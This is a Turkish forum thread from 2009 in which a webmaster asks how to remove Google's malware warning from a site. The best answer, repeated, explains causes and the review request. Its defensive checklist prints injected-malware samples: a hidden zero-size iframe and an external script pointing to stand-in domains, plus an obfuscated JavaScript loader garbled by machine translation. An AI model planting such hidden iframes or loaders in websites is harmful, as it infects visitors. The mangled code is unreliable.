Arama

Google zararlı içerik sorunu nasıl çözülür?

En İyi Cevap Var Güncelleme: 20 Haziran 2009 Gösterim: 5.818 Cevap: 3
Fenerliozo - avatarı
Fenerliozo
Ziyaretçi
31 Ocak 2009       Mesaj #1
Fenerliozo - avatarı
Ziyaretçi
Google den neye girsem bu yazı çıkıyor

Uyarı- bu siteyi ziyaret etmek bilgisayarınıza zarar verebilir!

Öneriler:
  • Önceki sayfaya dönün ve başka bir sonuç seçin.
  • Aradığınızı bulmak için başka bir arama yapmayı deneyin.
Veya sorumluluğu üzerinize alarak http://www.heytraveltrends.com/ adresine gidebilirsiniz. Bulduğumuz sorunlar hakkında ayrıntılı bilgi edinmek amacıyla Google'ın bu site için Güvenli Tarama teşhis sayfasını ziyaret edin.

Online iken zararlı yazılımlardan nasıl korunacağınız konusunda daha fazla bilgi için StopBadware.org adresini ziyaret edebilirsiniz.

Bu web sitesinin sahibiyseniz, Google’ın Web Yöneticisi Araçları ile sitenizin gözden geçirilmesini isteyebilirsiniz. İnceleme süreciyle ilgili daha fazla bilgi için Google'ın Web Yöneticisi Yardım Merkezi'ni ziyaret edin.
Tavsiye kaynağımalware logo

Yardımcı olurmusunuz
EN İYİ CEVABI fadedliver verdi
Alıntı
AdaLi_Kiz adlı kullanıcıdan alıntı

18 haziranda taramış sitemizi bugün farkettik
İndexte iframe koduyla site linki varmiş kaldırdım.

Sponsorlu Bağlantılar
ama hala zararlı işerik var uayrısı alıyorum.
Google bizim siteyi bir daha ne zman tarar ya da
google'in bizi tekrar taramasını nasıl sağlarım yardımcı olursanız sevinirim

Bu site bilgisayarınıza zarar verebilir yazısını kaldırmanın yollarını adım adım sizlere anlatacağım.
Bu site bilgisayarınıza zarar verebilir uyarısı nedir?
Google kullanıcılarını zararlı sitelerden korumak için bu tür uyarı yazısını koymaktadır. Bu yazı konulan site, ya virüsler tarafından saldırıya uğramıştır yada casus yazılımlar içermektedir.
Bu uyarının amacı kullanıcıları sitelerden uzak tutmak ve site yöneticisini sitesinde casus yazılım olduğundan yada virüs bulunduğundan haberdar etmektir. Yahoo arama sonuçlarındada benzer uyarı yazısı bulunmaktadır.
Site yöneticisi bu yazının ne anlama geldiğini neden böyle bir yazı ile kullanıcıların Google üzerinden sitelerine girilmesine engel olunduğunu bilmek ister.

Google siteyi hangi sebeplerle bu site bilgisayarınıza zarar verebilir diye işaretler?
Bunu bir kaç şekilde açıklamak eminim daha yararlı olacaktır.
1. Siteniz hacklenmiş olabilir. Sitenizi siz farkında olmadığınız halde hackleyen kişi, sitenize zararlı kod, zararlı koda yönlendirme, yada .htacces dosyasınızda değişiklik yaparak sitenizde casus yazılım, zararlı içerik bulundurmanızı sağlayabilir.
2. Sitenize eklediğiniz herhangi bir koddan kaynaklanabilir. Bu kod sitenizi eklediğiniz zararlı toplist, sitenize eklediğiniz “src = http://siteadi” ile başlayan PHP kodlarından gelebilmektedir. Bunlardan başka ayrıca reklamlar, top10 siteleri, sayaçları bulunan siteler gibi sitelerindeki virüsleri yada casus yazılımları diğer sitelere gönderebilen sitelerden gelebilir.
3. Flash dosyaları ve swf dosyaları sitenize virüs bulaştırabilir.
4. Siteniz üzerinde kötü amaçlı yazılım bulunduğundan yada kötü amaçlı casus yazılımlara bağlantı verdiğinizden kaynaklanabilir.
StopBadware, Google’da kötü amaçlı yazılımlara ve virüslere karşı Google’a yardımcı olmaktadır. Sitenizdeki sorunlara yardımcı olması açısından sizin haberiniz olmadan eklenen yada sizin eklediğiniz şu kodları lütfen kontrol ediniz. İşte o kodlar;
<iframe src=” http://hgfdetre.com /path/file” width=”0″ height=”0″ frameborder=”0″ style=”display:none”> </ IFRAME>
language=”JavaScript” <script src=” http://gfgffghfghfg.com /path/file.js”> </ script>
<script language=”JavaScript”> işlevi nbsp () (var t, o, l, i, j; var =’’s; s + =’47116101120 ‘; s + =’097114099111′; s = s +’1203403211910 ‘; var = s +’7121058110111112 ‘; s = s +’9062032′; t =”; l = s.length; i = 0; while (i <(l-1)) ((j = 0; J <3; J + + ) (t + = s.charAt (i); i + +;) if (((0xBF))> unscape (0×00)) t-=- (uescape (0×08) + unescae (0×30)); nescape doc.rite t ( String.froCharCode (t)); değil =”;}} nbsp (); </ script>
Zararlı içeriği tespit edip kaldırdıktan sonra, izlemenizi önerdiğim yol:
1 - Google hesabınızla Araçlar’a giriş yapın.
2 - Kontrol panelinden sitenizi seçin.
3 - Genel Bakış sayfasındaki İnceleme talebinde bulunun’u tıklayın ve sonrasında anlatılan adımları uygulayın.
Siteniz kısa zamanda incelenir ve zararlı içeriğin ortadan kalktığına emin olunduğu takdirde, arama sonuçlarındaki uyarı da kaldırılır.

kaynak
Keten Prenses - avatarı
Keten Prenses
Kayıtlı Üye
31 Ocak 2009       Mesaj #2
Keten Prenses - avatarı
Kayıtlı Üye
Google tarayıcısından kaynaklanan bir sorun var..ayarlarınızla oynamadan bekleyiniz.. benimde yaşadığım bir sorun..
Sponsorlu Bağlantılar
Quo vadis?
AdaLi_Kiz - avatarı
AdaLi_Kiz
Ziyaretçi
20 Haziran 2009       Mesaj #3
AdaLi_Kiz - avatarı
Ziyaretçi
fadedliver - avatarı
fadedliver
Ziyaretçi
20 Haziran 2009       Mesaj #4
fadedliver - avatarı
Ziyaretçi
Bu mesaj 'en iyi cevap' seçilmiştir.
Alıntı
AdaLi_Kiz adlı kullanıcıdan alıntı

Bu site bilgisayarınıza zarar verebilir yazısını kaldırmanın yollarını adım adım sizlere anlatacağım.
Bu site bilgisayarınıza zarar verebilir uyarısı nedir?
Google kullanıcılarını zararlı sitelerden korumak için bu tür uyarı yazısını koymaktadır. Bu yazı konulan site, ya virüsler tarafından saldırıya uğramıştır yada casus yazılımlar içermektedir.
Bu uyarının amacı kullanıcıları sitelerden uzak tutmak ve site yöneticisini sitesinde casus yazılım olduğundan yada virüs bulunduğundan haberdar etmektir. Yahoo arama sonuçlarındada benzer uyarı yazısı bulunmaktadır.
Site yöneticisi bu yazının ne anlama geldiğini neden böyle bir yazı ile kullanıcıların Google üzerinden sitelerine girilmesine engel olunduğunu bilmek ister.

Google siteyi hangi sebeplerle bu site bilgisayarınıza zarar verebilir diye işaretler?
Bunu bir kaç şekilde açıklamak eminim daha yararlı olacaktır.
1. Siteniz hacklenmiş olabilir. Sitenizi siz farkında olmadığınız halde hackleyen kişi, sitenize zararlı kod, zararlı koda yönlendirme, yada .htacces dosyasınızda değişiklik yaparak sitenizde casus yazılım, zararlı içerik bulundurmanızı sağlayabilir.
2. Sitenize eklediğiniz herhangi bir koddan kaynaklanabilir. Bu kod sitenizi eklediğiniz zararlı toplist, sitenize eklediğiniz “src = http://siteadi” ile başlayan PHP kodlarından gelebilmektedir. Bunlardan başka ayrıca reklamlar, top10 siteleri, sayaçları bulunan siteler gibi sitelerindeki virüsleri yada casus yazılımları diğer sitelere gönderebilen sitelerden gelebilir.
3. Flash dosyaları ve swf dosyaları sitenize virüs bulaştırabilir.
4. Siteniz üzerinde kötü amaçlı yazılım bulunduğundan yada kötü amaçlı casus yazılımlara bağlantı verdiğinizden kaynaklanabilir.
StopBadware, Google’da kötü amaçlı yazılımlara ve virüslere karşı Google’a yardımcı olmaktadır. Sitenizdeki sorunlara yardımcı olması açısından sizin haberiniz olmadan eklenen yada sizin eklediğiniz şu kodları lütfen kontrol ediniz. İşte o kodlar;
<iframe src=” http://hgfdetre.com /path/file” width=”0″ height=”0″ frameborder=”0″ style=”display:none”> </ IFRAME>
language=”JavaScript” <script src=” http://gfgffghfghfg.com /path/file.js”> </ script>
<script language=”JavaScript”> işlevi nbsp () (var t, o, l, i, j; var =’’s; s + =’47116101120 ‘; s + =’097114099111′; s = s +’1203403211910 ‘; var = s +’7121058110111112 ‘; s = s +’9062032′; t =”; l = s.length; i = 0; while (i <(l-1)) ((j = 0; J <3; J + + ) (t + = s.charAt (i); i + +Msn Wink if (((0xBF))> unscape (0×00)) t-=- (uescape (0×08) + unescae (0×30)); nescape doc.rite t ( String.froCharCode (t)); değil =”;}} nbsp (); </ script>
Zararlı içeriği tespit edip kaldırdıktan sonra, izlemenizi önerdiğim yol:
1 - Google hesabınızla Araçlar’a giriş yapın.
2 - Kontrol panelinden sitenizi seçin.
3 - Genel Bakış sayfasındaki İnceleme talebinde bulunun’u tıklayın ve sonrasında anlatılan adımları uygulayın.
Siteniz kısa zamanda incelenir ve zararlı içeriğin ortadan kalktığına emin olunduğu takdirde, arama sonuçlarındaki uyarı da kaldırılır.

kaynak